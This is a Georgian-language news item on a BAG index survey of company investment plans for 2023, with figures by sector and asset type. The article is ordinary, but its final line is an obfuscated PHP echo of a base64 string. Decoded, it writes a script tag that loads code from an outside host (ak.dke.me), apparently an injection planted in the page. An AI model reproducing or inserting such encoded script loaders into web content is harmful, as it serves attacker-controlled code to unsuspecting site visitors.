celsiusi
ავერსი შნაიდერი

2023 წლის მესამე კვარტალში გამოკითხული კომპანიების 68% აცხადებს, რომ  წინა წელთან შედარებით, 2023 წელს მათ მიერ განხორციელებული ინვესტიციების მოცულობა  გაიზრდება, აღნიშნულის შესახებ საქართველოს ბიზნეს ასოციაციის წევრი  კომპანიების BAG ინდექსის გამოკითხვის შედეგად გახდა ცნობილი.

ამასთან აღსანიშნავია, რომ გამოკითხული კომპანიების 24% ინვესტიციების ოდენობის 2022 წლის დონეზე შენარჩუნებას ვარაუდობს, ხოლო 7% - კლებას პროგნოზირებს.

საგულისხმოა, რომ აღნიშნული მაჩვენებელი გაუმჯობესებულია პირველ კვარტალში დაფიქსირებულ მაჩვენებელთან შედარებით.

აღსანიშნავია, რომ სექტორებს შორის, ყველაზე ოპტიმისტური მოლოდინი 2023 წელს ინვესტიციების განხორციელებასთან დაკავშირებით ვაჭრობის სექტორში ფიქსირდება, კერძოდ, კომპანიათა 76% გეგმავს ჯამური ინვესტიციების ზრდას. მომსახურებისა და მშენებლობის სექტორებში მსგავსი მოლოდინი გამოკითხულ კომპანიათა 67% და 64%-ს აქვს, ხოლო მრეწველობის სექტორში 50%-ს.

ასევე, უნდა აღინიშნოს, რომ მიმდინარე კვარტალში გამოკითხული კომპანიების 63% ვარაუდობს, რომ ინვესტიციებს აღჭურვილობების მიმართულებით გაზრდის. 59%-ს მსგავსი მოლოდინი პროგრამული უზრუნველყოფისა და მონაცემთა ბაზების მიმართულებით აქვს, ხოლო 57% გეგმავს ინვესტიციის განხორციელებას შენობა-ნაგებობებში.

საერთო ჯამში, 2023 წელს ინვესტიციების გაზრდას ან უცვლელ დონეზე შენარჩუნებას ჯამურად, ბიზნესის 93% გეგმავს.

შეგახსენებთ, რომ ინვესტიციების კვლევა BAG ინდექსის ფარგლებში წელიწადში ორჯერ ტარდება და საქართველოს ბიზნეს ასოციაციის წევრებისა და მათ ჯგუფში შემავალი კომპანიების საინვესტიციო საქმიანობას მიმოიხილავს. მიმდინარე კვლევა აჯამებს 2022 წელს განხორციელებულ ინვესტიციებს და მიმოიხილავს საინვესტიციო გეგმებს 2023 წლისთვის.

BAG ინდექსს საქართველოს ბიზნეს ასოციაცია და PMC კვლევითი ცენტრი ifo ეკონომიკური კვლევების ინსტიტუტის მეთოდოლოგიაზე დაყრდნობით აწარმოებს.

კვლევის ანგარიში შეგიძლიათ იხილოთ ბმულზე.

258
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");